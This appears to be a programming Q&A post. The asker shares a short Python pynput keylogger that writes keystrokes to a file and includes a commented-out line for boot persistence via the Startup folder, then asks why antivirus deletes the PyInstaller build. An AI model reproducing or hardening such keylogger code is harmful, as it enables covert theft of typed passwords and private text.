# PyInstaller file opens a cmd window and deletes the .exe file

Tags: python, windows, cmd, pyinstaller

This is my code:

```
from pynput.keyboard import Listener 
import os 
import logging 
from shutil import copyfile

username = os.getlogin() 
logging_directory = f'D:/'

#copyfile('Keylogger.py', f'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Keylogger.py') 
#For executing this program everytime system boots

logging.basicConfig(filename=f'{logging_directory}/log.txt', level=logging.DEBUG, format='%(asctime)s: %(message)s')

def key_handler(key): 
    logging.info(key)

with Listener(on_press=key_handler) as listener: 
    listener.join()
```

So I installed pyinstaller and was able to create a .exe file called Keylogger.exe. However, after I run the program, it opens for a second and then disappears from the system. It's not in the recycle bin either. I also tried to run it as an administrator but it still shows the same results. When I executed this with cmd, it just said:

```
The system cannot execute the specified program
```

How do I fix this issue?

Update: I disabled anti-virus. Now it just says that the file can't be executed

Comment: I'd check your anti-virus logs.

Comment: Maybe you have to do something special to use Pynput with PyInstaller. Add some print()s to show how far it gets before dying? E.g. https://stackoverflow.com/questions/63681770/getting-error-when-using-pynput-with-pyinstaller#63721929 - do some searching